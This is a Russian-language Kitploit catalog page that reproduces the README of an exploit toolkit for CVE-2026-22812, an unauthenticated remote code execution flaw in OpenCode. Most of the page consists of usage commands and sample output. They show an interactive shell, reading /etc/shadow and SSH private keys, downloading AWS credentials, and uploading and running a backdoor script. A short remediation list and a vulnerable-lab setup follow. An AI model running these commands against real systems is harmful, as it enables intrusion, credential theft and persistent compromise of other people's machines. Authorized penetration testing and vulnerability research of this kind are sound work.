Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-22812-exploit — Набор инструментов для эксплуатации CVE-2026-22812 (неаутентифицированное удалённое выполнение кода в OpenCode), предоставляющий интерактивную оболочку, выполнение произвольных команд, загрузку/скачивание файлов и перечисление системных данных для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

Репозиторий
3367 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Набор инструментов для эксплуатации CVE-2026-22812 (неаутентифицированное удалённое выполнение кода в OpenCode), предоставляющий интерактивную оболочку, выполнение произвольных команд, загрузку/скачивание файлов и перечисление системных данных для авторизованного тестирования безопасности.

Поделиться

Инструмент эксплуатации CVE-2026-22812

Python CVSS

Полнофункциональный набор инструментов для эксплуатации CVE-2026-22812 — неаутентифицированное удалённое выполнение кода в OpenCode


🎯 Обзор

Инструмент эксплуатации CVE-2026-22812 — это комплексная платформа для эксплуатации уязвимости неаутентифицированного удалённого выполнения кода в OpenCode. Инструмент предоставляет несколько методов эксплуатации, включая интерактивную оболочку, операции с файлами и перечисление системной информации.

Детали уязвимости

  • CVE ID: CVE-2026-22812
  • Затронутые версии: OpenCode < 1.0.216
  • Оценка CVSS: 8.8 (Высокая)
  • Вектор атаки: Сеть
  • Аутентификация: Не требуется
  • Воздействие: Полная компрометация системы

✨ Возможности

🔓 Возможности эксплуатации

  • ✅ Создание сеанса без аутентификации
  • ✅ Выполнение произвольных команд (RCE)
  • ✅ Интерактивная оболочка с историей команд
  • ✅ Загрузка/скачивание файлов
  • ✅ Чтение произвольных файлов
  • ✅ Создание PTY-сеанса
  • ✅ Перечисление системной информации
  • ✅ Поддержка прокси (совместимость с Burp Suite)

📦 Установка

Предварительные требования

  • Python 3.7+
  • pip
  • библиотека requests

Быстрая установка

root@kitploit:~
# Клонировать репозиторий
git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
cd CVE-2026-22812-exploit

# Установить зависимости
pip3 install -r requirements.txt

Ручная установка

root@kitploit:~
pip3 install requests urllib3

🚀 Использование

Базовая эксплуатация

1. Проверка уязвимости цели

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 --verify

Вывод:

root@kitploit:~
[+] Цель УЯЗВИМА к CVE-2026-22812!
[+] ID сеанса: abc123def456

2. Выполнение одной команды

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -c "id"

Вывод:

root@kitploit:~
[*] Создание сеанса...
[+] Сеанс создан: abc123def456
[+] Цель УЯЗВИМА!

[*] Выполнение: id
[+] Команда выполнена успешно

uid=1000(developer) gid=1000(developer) groups=1000(developer)

3. Режим интерактивной оболочки

root@kitploit:~
python3 exploit.py -t http://192.168.1.10:4096 -i

Интерактивный сеанс:

root@kitploit:~
[+] Сеанс создан: abc123def456
[+] Цель УЯЗВИМА!

[*] Вход в режим интерактивной оболочки
[!] Введите 'help' для списка команд, 'exit' для выхода

developer@target$ whoami
developer

developer@target$ pwd
/home/developer/workspace

developer@target$ ls -la
total 48
drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
-rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
...

developer@target$ read /etc/hostname
[*] Чтение файла: /etc/hostname
[+] Файл прочитан успешно (10 байт)
dev-server-01

developer@target$ exit
[*] Выход...

📚 Подробное использование

Выполнение команд

root@kitploit:~
# Одна команда
python3 exploit.py -t http://target:4096 -c "whoami"

# Сложная команда
python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"

# Несколько команд
python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"

Операции с файлами

Чтение файлов

root@kitploit:~
# Чтение конфиденциальных файлов
python3 exploit.py -t http://target:4096 -r /etc/passwd
python3 exploit.py -t http://target:4096 -r /etc/shadow
python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa

Загрузка файлов

root@kitploit:~
# Загрузка shell-скрипта
python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh

# Загрузка бинарного файла
python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload

# Загрузка с последующим выполнением
python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"

Скачивание файлов

root@kitploit:~
# Скачивание конфигурации
python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt

# Скачивание учётных данных
python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt

# Скачивание исходного кода
python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json

Перечисление системной информации

root@kitploit:~
# Сбор информации о системе
python3 exploit.py -t http://target:4096 --sysinfo

Вывод:

root@kitploit:~
{
  "hostname": "dev-server-01",
  "username": "developer",
  "user_id": "uid=1000(developer) gid=1000(developer)",
  "current_dir": "/home/developer/workspace",
  "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
  "os_release": "Ubuntu 22.04.3 LTS",
  "ip_address": "192.168.1.10",
  "processes": "..."
}

Устранение уязвимости

  1. Немедленно обновитесь: npm install -g opencode-ai@latest
  2. Завершите процессы: pkill -f opencode
  3. Проверьте журналы: Просмотрите системные журналы на предмет признаков компрометации
  4. Смените учётные данные: Измените пароли, ключи SSH
  5. Проведите аудит систем: Проверьте на наличие бэкдоров

🧪 Настройка тестовой лаборатории

Использование Docker (рекомендуется)

root@kitploit:~
# Dockerfile для уязвимой версии OpenCode
FROM node:18
RUN npm install -g [email protected]
EXPOSE 4096
CMD ["opencode"]
root@kitploit:~
# Сборка и запуск
docker build -t opencode-vuln .
docker run -p 4096:4096 opencode-vuln

# Тестирование эксплойта
python3 exploit.py -t http://localhost:4096 -i

Ручная настройка

root@kitploit:~
# Установка уязвимой версии
npm install -g [email protected]

# Запуск OpenCode
opencode

# В другом терминале запустите эксплойт
python3 exploit.py -t http://localhost:4096 --verify

⚠️ Никогда не разворачивайте уязвимые версии в производственной среде!


📚 Ссылки

Информация об уязвимости

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
  • Консультация GitHub: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
  • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

⚠️ Правовое предупреждение

ПРОЧТИТЕ ВНИМАТЕЛЬНО

Данный инструмент предоставляется ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.

❌ Запрещённое использование

  • Несанкционированный доступ к системам
  • Сканирование без разрешения
  • Любая незаконная деятельность
  • Вредоносные цели
  • Производственные системы без авторизации

Правовое уведомление

Авторы:

  • НЕ одобряют незаконное использование
  • НЕ несут ответственности за неправильное использование
  • НЕ будут поддерживать незаконную деятельность
  • НЕ принимают НА СЕБЯ НИКАКОЙ ОТВЕТСТВЕННОСТИ

Используя данный инструмент, вы соглашаетесь:

  • Получить надлежащую авторизацию
  • Соблюдать все законы
  • Принять полную ответственность
  • Использовать этично и ответственно

ИСПОЛЬЗУЙТЕ НА СВОЙ РИСК


⭐ Поставьте звезду, если полезно! ⭐
Только для авторизованного тестирования безопасности

Скачать инструмент